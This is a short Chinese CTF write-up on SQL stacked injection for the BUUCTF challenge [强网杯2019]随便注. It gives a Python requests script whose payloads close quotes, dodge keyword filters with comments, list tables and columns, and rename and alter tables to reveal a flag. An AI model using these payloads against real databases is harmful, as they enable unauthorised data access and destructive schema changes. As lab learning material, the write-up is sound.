SQL 堆叠注入

什么是堆叠注入？ 顾名思义，堆叠注入就是将一堆sql语句叠加在一起执行，使用分号结束上一个语句再叠加其他语句一起执行。 首先尝试闭合引号，并注释后面的内容。

刷题记【BUUCTF/WEB/[强网杯2019]随便注】

# -*- coding: utf-8 -*-
import requests


url = "http://d9ef2781-d881-400b-8146-ae775ccb7443.node4.buuoj.cn:81/"
#params = {"inject":"3' or '1'='1"} #test ok
params = {"inject":"3' or '1'='1'#"} #test ok
params = {"inject":"3' or '1'='1'#sel/**/ect"} #test ok
params = {"inject":"3' uni/**/on sel/**/ect 1,2,3,4,5#"} #test not ok

params = {"inject":"3'; show databases;#"} #堆叠注入
params = {"inject":"3'; show tables;#"} #堆叠注入 1919810931114514,words
#params = {"inject":"3'; sel/**/ect * from 1919810931114514;#"} #test not ok

params = {"inject":"3'; desc `1919810931114514`;#"} #堆叠注入, cols:flag
params = {"inject":"3'; desc `words`;#"} #堆叠注入, cols:id,data


params = {"inject":"0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#"} #堆叠注入, 改表

params = {"inject":"3' or '1'='1'#"} #test ok, get flag

response = requests.get(url, params)
print response.text

References

https://www.cnblogs.com/wjw-zm/p/12359735.html
https://blog.csdn.net/weixin_45642610/article/details/112337143